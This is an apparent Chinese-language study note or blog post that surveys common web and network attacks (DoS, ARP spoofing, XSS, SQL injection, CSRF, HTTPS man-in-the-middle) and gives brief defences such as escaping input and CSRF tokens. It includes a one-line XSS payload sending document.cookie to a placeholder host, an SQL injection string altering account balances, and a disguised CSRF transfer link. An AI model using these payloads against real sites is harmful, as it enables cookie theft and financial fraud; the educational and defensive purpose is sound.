首先提一笔,在公司上班后的我们,要遵守公司的SOP,人走盖电脑,之类不让人看到你电脑信息的东西,一般公司会让你用公司电脑开发,极个别可以用自己电脑。那么我们就思维的聊一下网络安全攻击吧。
攻击手段
阻断服务攻击(DoS)
- 阻断服务攻击(Denial-of service attack),想办法将目标网络资源用尽
- 变种:分布式阻断服务攻击(Distributed Denial-of service)
- 带宽消耗型(消耗目标的带宽)
- 资源消耗型(消耗目标的计算资源)
肉机,被病毒感染的计算机,攻击者远程肉机,然后进行攻击
防御
- 防火墙 好的防火墙可以识别异常流量
- 交换机(路由器) 类似于防火墙
- 流量清晰 类似防火墙,异常。
地址解析欺骗(Address Resolution Reotocol spoofing)
因为可以用做局域网调试工具,也可以被用做工具
- 地址解析 内网里有自己的MAC 地址 每一个主机定期发一个ARP请求,其他主机收到了这个请求,就会去返回自己的IP MAC_C
- 欺骗 就是拿着人家的IP 和自己的MAC去骗信息
- 局域网中就是要去加入这个第三方,然后去监听封包。
跨站脚本攻击(XSS)
将跨站脚本(Cross Site Scripting) 注入到被攻击的网页上,
用户打开网页会执行跨站脚本。
document.createElement('script').src='http://.../?='+document.cookie 偷kookie
- 输入过滤(转义)
- 输出过滤(转义)
SQL注入
';update user set money=99999 where id = 10025;//'
跨站请求伪造(csrf)
https://a.com/transfer?money=10000&to=123456
<a href='https://a.com/transfer?money=10000&to123456'>点击下载有趣内容</a>
登录之后,就会有信息保存在网站里,然后,攻击就拿到这个,让你点击别的然后执行这个地址,从而拿到钱
请求改为post,加一个name = 'csrf' value='123asdafa12'
这个value是这个正确的网站打开才生成
HTTPS中间人攻击
正常的是,客户端给服务端发请求,服务端发证书认证,返回信息
黑客走到中间,会和服务端进行真正的通信,然后又会接收客户端请求,发伪造的证书,前提就是在客户端上安装了非法根证书。
黑客换成Fiddle,Chales,Whistle 这些合法工具,这个就是HTTPS抓包工具
如果中间换成爬虫,就是一边读客户端数据,一边返回服务器请求。